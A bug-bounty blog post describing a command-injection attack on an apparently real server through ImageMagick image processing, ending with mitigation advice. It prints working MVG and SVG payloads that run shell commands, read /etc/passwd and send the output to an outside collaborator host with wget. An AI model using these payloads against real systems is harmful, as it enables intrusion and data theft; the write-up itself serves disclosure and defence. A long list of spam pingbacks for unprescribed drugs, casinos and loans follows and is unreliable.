Abusing ImageMagick to obtain RCE

Bug Bounty

Remote Code Execution because of an image source? Is it Possible? Yes! Definitely. Here in this blog post, a Strynx team member found a variation of Remote Code Execution AKA RCE through ImageMagick which earned him a generous bounty of $5000. Amazingly, some tweaks inside the image source exfiltrated the data over DNS (also called side-channel attacks). Let’s see how was it done after a short introduction to ImageMagick.

 What is ImageMagick? ImageMagick is a free and open-source software suite for displaying, converting, and editing raster image and vector image files. It can read and write over 200 image file formats. Suprisingly ImageMagick is used by many Fortune 500 companies. ImageMagick is very popular and some plugins make it easy to use with PHP, Ruby, Node.js and other languages so it is common for websites to use it for image resizing or cropping.

#Protip: If a website uses your photo and crops them into the avatar, there may be a good chance that the website is using ImageMagick to do that.

 Coming on to vulnerabilities. Is it secured? No, you have to manually take efforts in securing them. In the year 2016, researchers discovered that it was possible to execute arbitrary code (CVE-2016-3714) by hiding it inside image files that a user uploads. That means an attacker can make a web server do its bidding by uploading an image containing code the attacker chooses. This is all denoted in the site https://imagetragick.com/ which deals on these vulnerabilities and how to mitigate them.

Vulnerabilities in Image Decoder:

ImageMagick allows processing files with external libraries. This feature is called ‘delegate’. It is implemented as a system() with command string (‘command’) from the config file delegates.xml with the actual value for different params (input/output filenames etc). Due to insufficient %M param filtering, it is possible to conduct shell command injection. The most dangerous part is ImageMagick supports several formats like svg, mvg – which allow to include external files from any supported protocol including delegates. As a result, any service, which uses ImageMagick to process user-supplied images and uses default delegates.xml / policy.xml, may be vulnerable to this issue. Some common exploits: (Code execution commands are set as bold)

exploit.mvg 
 
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context
exploit.svg 
 
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg width="640px" height="480px" version="1.1"

xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=

"http://www.w3.org/1999/xlink";>

<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"

x="0" y="0" height="640px" width="480px"/>

</svg>

Here in this case study, we will use our mvg exploit which is interpreted by the server, and when decoded, causes code to execute.

Abusing ImageMagick library to get Remote Code Execution

The program which is being mentioned in the blog post is a private program, hence the representation of the site would be example.com as disclosure is not allowed.

With static image file interpretation, it was observed that ImageMagick was possibly being used in the application. The image file contained certain keywords which helped conclude the possibility. The URL was as follows: https://subdomain.example.com/directory/5b9682b23bb………:avatar?a44c0de5…..c54b5&x6xx9jul3=1

After analysing the source of the image file it was found that an interesting string “EXtdate:modify” resided in it. It was observed that the server converted pictures with “ImageMagick”/”GraphicksMagick” but did not add the -strip command line option. Therefore now the converted image now has the plaintext tEXtdate: create.

Along with this, EXtdate: modify and timestamps are usually included in the png files.

Thus after obtaining this information, it was time to exploit this issue. The exploits shown above were now modified to test the time-based payloads. Here is the sample code used:

push graphic-context
viewbox 0 0 200 200
fill ‘url(https://example.org/vfqBnrslJIi/”;sleep “6.0)’
pop graphic-context

The payload was converted into base64 as the parameter supplying the request indicated it was base64 decoding the request. The newly generated payload for parameter d64:

cHVzaCBncmFwaGljLWNvbnRleHQKdmlld2JveCAwIDAgMjAwIDIwMApmaWxsICd1cmwoaHR0cHM6Ly9leGFtcGxlLm9yZy92ZnFCbnJzbEpJaS8iO3NsZWVwICI2LjApJwpwb3AgZ3JhcGhpYy1jb250ZXh0

It was observed that the payload was base64 decoded and the response was in a delay of 6.0 seconds, confirming the attack.

It was time to exploit further. Direct read access wasn’t presented thus with the help of burp collaborator the results to the executed codes was obtained. The payload was modified to store the output of a command in a txt file and then using wget –post-file to our burp collaborator.

Firstly, the user of the application was checked using whoami. The payload was generated as follows:

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg “|whoami>>/tmp/pwned.txt”)’
pop graphic-context.

The result of the command was stored in pwned.txt and thus using burp collaborator the file was read as follows:

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg “|wget –post-file /tmp/pwned.txt XXX.burpcollaborator.net”)’
pop graphic-context

A ping was observed in the burp collaborator with the request containing the user of the application.

To fully demonstrate the impact a POC was generated to read the contents of /etc/passwd. Using the same steps the two payloads were as follows:

  1. Saving output to pwned.txt
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg “|cat /etc/passwd >>/tmp/pwned.txt”)’
pop graphic-context
  1. Reading the file using our collaborator
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg “|wget –post-file /tmp/pwned.txt XXX.burpcollaborator.net”)’
pop graphic-context

As seen in the screenshot, the contents of /etc/passwd of the server were now read confirming the issue on the server.

The issue was reported to the company’s vulnerability disclosure program using appropriate measures. The vulnerability was confirmed within hours of reporting and the fixed was deployed as soon as possible. A bounty of $5000 was rewarded for this issue.

If your website uses ImageMagick Library make sure you mitigate it with appropriate steps as shown below:

  • Verify that all image files begin with the expected “magic bytes” corresponding to the image file types you support before sending them to ImageMagick for processing. (see FAQ for more info)
  • Use a policy file to disable the vulnerable ImageMagick coders. The global policy for ImageMagick is usually found in “/etc/ImageMagick”. The below policy.xml example will disable the coders EPHEMERAL, URL, MVG, and MSL.
Policy.xml file:

<policymap><policy domain="coder" rights="none" pattern="EPHEMERAL" /><policy domain="coder" rights="none" pattern="URL" /><policy domain="coder" rights="none" pattern="HTTPS" /><policy domain="coder" rights="none" pattern="MVG" /><policy domain="coder" rights="none" pattern="MSL" /><policy domain="coder" rights="none" pattern="TEXT" /><policy domain="coder" rights="none" pattern="SHOW" /><policy domain="coder" rights="none" pattern="WIN" /><policy domain="coder" rights="none" pattern="PLT" /></policymap>

That’s all for this blog. Hope you liked it. Stay tuned for upcoming posts. Please subscribe to the blog if you haven’t done yet to never miss any blogs published to the site. Have a nice day!

December 24, 2019
Admin
Bug Bounty
6,792 Comments

6,792 thoughts on “Abusing ImageMagick to obtain RCE”

  1. Pingback: viagra alternative

  2. Pingback: viagra for men

  3. Pingback: canadian pharmacy viagra

  4. Pingback: buy viagra now

  5. Pingback: generic for viagra

  6. Pingback: generic sildenafil 100mg india

  7. Pingback: viagra online

  8. Pingback: alternatives to viagra that work

  9. Pingback: buy viagra pills

  10. Pingback: generic viagra cost

  11. Pingback: viagra prices

  12. Pingback: where to buy viagra without prescription in san francisco

  13. Pingback: where to buy viagra in melbourne australia

  14. Pingback: order propecia

  15. Pingback: cheap viagra

  16. Pingback: buy viagra inline

  17. Pingback: generic sildenafil

  18. Pingback: viagra

  19. Pingback: Viagra 150mg coupon

  20. Pingback: generic viagra

  21. Pingback: order Viagra 130 mg

  22. Pingback: Viagra 120mg prices

  23. Pingback: Viagra 25 mg australia

  24. Pingback: Viagra 120mg online

  25. Pingback: cheap sildenafil

  26. Pingback: buy viagra online

  27. Pingback: buy Viagra 100 mg

  28. Pingback: Viagra 120mg australia

  29. Pingback: how to purchase Cialis 20 mg

  30. Pingback: Cialis 80mg pills

  31. Pingback: generic cialis

  32. Pingback: Cialis 60mg canada

  33. Pingback: cost of Cialis 60 mg

  34. Pingback: Cialis 40 mg prices

  35. Pingback: RxTrustPharm

  36. Pingback: buy cheap sildenafil

  37. Pingback: Cialis 60 mg pharmacy

  38. Pingback: order Cialis 20mg

  39. Pingback: how to purchase Cialis 80 mg

  40. Pingback: Cialis 10mg price

  41. Pingback: sildenafil 150 mg canada

  42. Pingback: canadian rx pharmacy

  43. Pingback: tadalafil 80 mg over the counter

  44. Pingback: tadalafil

  45. Pingback: levitra 40 mg without a doctor prescription

  46. Pingback: lasix 40mg online pharmacy

  47. Pingback: furosemide 100 mg without prescription

  48. Pingback: buying prescription drugs from canada

  49. Pingback: propecia 5 mg without a prescription

  50. Pingback: lexapro 20 mg pills

  51. Pingback: abilify 20mg online

  52. Pingback: viagra achat en france

  53. Pingback: actos 15 mg without a doctor prescription

  54. Pingback: buy aldactone 100mg

  55. Pingback: allegra 120 mg purchase

  56. Pingback: how to purchase allopurinol 300 mg

  57. Pingback: amaryl 4mg price

  58. Pingback: amoxicillin 500mg united kingdom

  59. Pingback: ampicillin 500 mg generic

  60. Pingback: order antabuse 250 mg

  61. Pingback: viagra pills

  62. Pingback: antivert 25mg price

  63. Pingback: arava 10 mg coupon

  64. Pingback: strattera 25 mg united states

  65. Pingback: where to buy aricept 10mg

  66. Pingback: arimidex 1mg medication

  67. Pingback: cheap cialis

  68. Pingback: cost of tamoxifen 20 mg

  69. Pingback: ashwagandha 60caps without a prescription

  70. Pingback: atarax 10mg medication

  71. Pingback: augmentin 750/250 mg united states

  72. Pingback: generic drugs without doctor's prescription

  73. Pingback: avapro 300mg uk

  74. Pingback: avodart 0,5 mg without a prescription

  75. Pingback: baclofen 25mg otc

  76. Pingback: cheapest bactrim 800/160 mg

  77. Pingback: viagra pill

  78. Pingback: canadian pharmacy viagra

  79. Pingback: benicar 20mg australia

  80. Pingback: buy Biaxin 250 mg

  81. Pingback: order Premarin 0,625mg

  82. Pingback: cheap buspar 5 mg

  83. Pingback: tadalafil generic

  84. Pingback: calcium carbonate 500mg prices

  85. Pingback: buy cialis

  86. Pingback: catapres medication

  87. Pingback: rxtrust pharm

  88. Pingback: buy viagra online

  89. Pingback: ceftin 250mg online

  90. Pingback: where can i buy celebrex

  91. Pingback: best pharmacy online

  92. Pingback: celexa otc

  93. Pingback: cephalexin 500mg coupon

  94. Pingback: cipro 750 mg cheap

  95. Pingback: cheap viagra

  96. Pingback: claritin 10mg nz

  97. Pingback: parx casino online

  98. Pingback: wind creek casino online games

  99. Pingback: best online casino usa

  100. Pingback: gambling casino

  101. Pingback: rxtrustpharm.com

  102. Pingback: play online casino real money

  103. Pingback: casino online real money

  104. Pingback: cheap ed pills

  105. Pingback: best real casino online

  106. Pingback: online gambling

  107. Pingback: chumba casino

  108. Pingback: online casino real money

  109. Pingback: car insurance quotes 21

  110. Pingback: accc car insurance

  111. Pingback: car insurance quotes comparison

  112. Pingback: cheap cialis

  113. Pingback: usaa car insurance

  114. Pingback: multiple car insurance quotes

  115. Pingback: car insurance specialists

  116. Pingback: hartford car insurance quotes

  117. Pingback: cialis miami

  118. Pingback: erie car insurance quotes group

  119. Pingback: ed supplements

  120. Pingback: viagra coupons walgreens

  121. Pingback: best car insurance quotes companies

  122. Pingback: buy cialis brand

  123. Pingback: personal car insurance

  124. Pingback: check into cash

  125. Pingback: top ed pills

  126. Pingback: payday loans raleigh nc

  127. Pingback: fast payday loans online

  128. Pingback: installment loans with low interest

  129. Pingback: best quick loans

  130. Pingback: how many mg of viagra should i take

  131. Pingback: levitra 20mg

  132. Pingback: bad credit loans lenders

  133. Pingback: cialis side effects

  134. Pingback: can i buy amoxicillin over the counter in australia

  135. Pingback: payday loans no credit check

  136. Pingback: womens viagra

  137. Pingback: cheap personal loans

  138. Pingback: viagra boner

  139. Pingback: cbd in marijuana

  140. Pingback: cialis from india

  141. Pingback: buy cbd oil with thc

  142. Pingback: what do blue pills do

  143. Pingback: viagra in action

  144. Pingback: cbd oil for pain relief where to buy

  145. Pingback: cbd oil benefits webmd

  146. Pingback: best generic cialis

  147. Pingback: vardenafil generic

  148. Pingback: viagra generic

  149. Pingback: instant online payday loans

  150. Pingback: cbd pills sale

  151. Pingback: viagra falls

  152. Pingback: cbd oil benefits webmd

  153. Pingback: is taking viagra painful

  154. Pingback: cheap generic cialis

  155. Pingback: side effects of cbd oil in dogs

  156. Pingback: how to buy viagra

  157. Pingback: cbd pills sale

  158. Pingback: viagra sample

  159. Pingback: best cbd oil for depression and anxiety

  160. Pingback: blue chew viagra

  161. Pingback: the assignments

  162. Pingback: buy levitra online cheap

  163. Pingback: levitra online

  164. Pingback: photo assignment

  165. Pingback: write essay for money

  166. Pingback: atorvastatin midol

  167. Pingback: kinetic books homework

  168. Pingback: buy essay online

  169. Pingback: premium assignments

  170. Pingback: custom essay writing service reviews

  171. Pingback: essays writing service

  172. Pingback: how to write argument essay

  173. Pingback: how to write a community service essay

  174. Pingback: cleocin cheap

  175. Pingback: clomid without a prescription

  176. Pingback: clonidine 0,1 mg purchase

  177. Pingback: sildenafil vs viagra

  178. Pingback: clozaril for sale

  179. Pingback: 100mg viagra

  180. Pingback: colchicine 0,5 mg nz

  181. Pingback: viagra vs cialis

  182. Pingback: symbicort inhaler 160/4,5mcg without a prescription

  183. Pingback: combivent canada

  184. Pingback: buy coreg

  185. Pingback: show cialis working

  186. Pingback: compare pharmacy prices for prescriptions

  187. Pingback: what are good essay writing services

  188. Pingback: how to purchase compazine 5mg

  189. Pingback: generic cialis

  190. Pingback: coumadin 2 mg uk

  191. Pingback: order cialis 20 mg

  192. Pingback: where to buy cozaar

  193. Pingback: crestor 10mg otc

  194. Pingback: customized essay

  195. Pingback: argumentative essay help

  196. Pingback: cymbalta 30 mg united states

  197. Pingback: buy viagra online

  198. Pingback: cheapest essays writing services

  199. Pingback: help me with my research paper

  200. Pingback: viagra tabs

  201. Pingback: write my paper in apa format

  202. Pingback: how to purchase dapsone 1000caps

  203. Pingback: ddavp pills

  204. Pingback: depakote 500mg online

  205. Pingback: diamox 250mg cheap

  206. Pingback: differin 15g united states

  207. Pingback: diltiazem without a prescription

  208. Pingback: viagra for sale

  209. Pingback: doxycycline medication

  210. Pingback: dramamine 50 mg for sale

  211. Pingback: elavil united kingdom

  212. Pingback: canadian pharmacy review

  213. Pingback: erythromycin 500 mg price

  214. Pingback: viagra or cialis

  215. Pingback: etodolac nz

Post a Comment

Your email address will not be published. Required fields are marked *

*